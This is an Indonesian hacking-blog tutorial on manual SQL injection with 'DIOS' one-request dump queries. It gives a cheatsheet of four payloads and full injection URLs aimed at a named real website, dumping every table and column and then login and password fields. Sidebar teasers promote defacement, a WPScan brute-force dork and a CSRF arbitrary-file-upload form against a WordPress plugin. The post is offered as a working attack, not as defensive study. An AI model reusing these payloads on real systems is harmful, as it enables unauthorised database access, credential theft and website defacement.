Skip to main content

Sqli Manual With DIOS

squadcyber.org - DIOS (Dump In One Shoot) yang artinya kita bisa Dump / mengeluarkan isi database dengan 1 kali request, pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh Dr.z3r0 ,M@dbl00d ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya.


DIOS cheatsheet

Query untuk Dump Semua Tabel dan Kolom


Profexer Query

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Dr.z3r0 Query

(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))


Zen Query

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

m@db100d Query

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))

pilih salah satu Query DIOS

Target :
http://www.icpconcepts.com/produit.php?id=55

step berikut nya order by / group by sprti old method manual sqli .
gw anggap kalian sudah bisa menemukan magic number...
Langsung replace column 21 / magic number nya dengan DIOS query
kita coba dump semua tabel dan kolom ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+


kan kita uda tahu nama tabel dan culumn name ,untuk dump / extrak data bgini ::
kita coba dump dari Tabel "connexion" column "id", "login" ,dan "passwd" ..
/! perhatikan baik2 query yg berubah. /

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+


#Nb

kalian bisa modif query nya :D
tambahin tag2 html/ sql function dalam concat()

contoh ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3C666F6E7420636F6C6F723D626C75653E3C623E496E6A6563746564204279205633726C75636869653C2F623E3C2F666F6E743E,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+


Tambahan ::
kita bs memasukkan tag2 html pada saat injeksi web..
seperti dll dengan syarat harus di convert dalam hex .lalu depannya dikasih 0x.
bentuk Hex ::
0x3C666F6E7420636F6C6F723D626C75653E3C623E496E6A6563746564204279205633726C75636869653C2F623E3C2F666F6E743E adalah Injected By V3rluchie
Dengan memakai tehnik ini kalian tidak perlu convert nama table, dan skaligus kita bisa tahu semua tabel dan kolom secara bersamaan :)

Tehnik Modern Manual SQLi yg simple dan cepat . Ketika Automatic Tool tdk Mampu , Manual mungkin bisa membantu .

Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...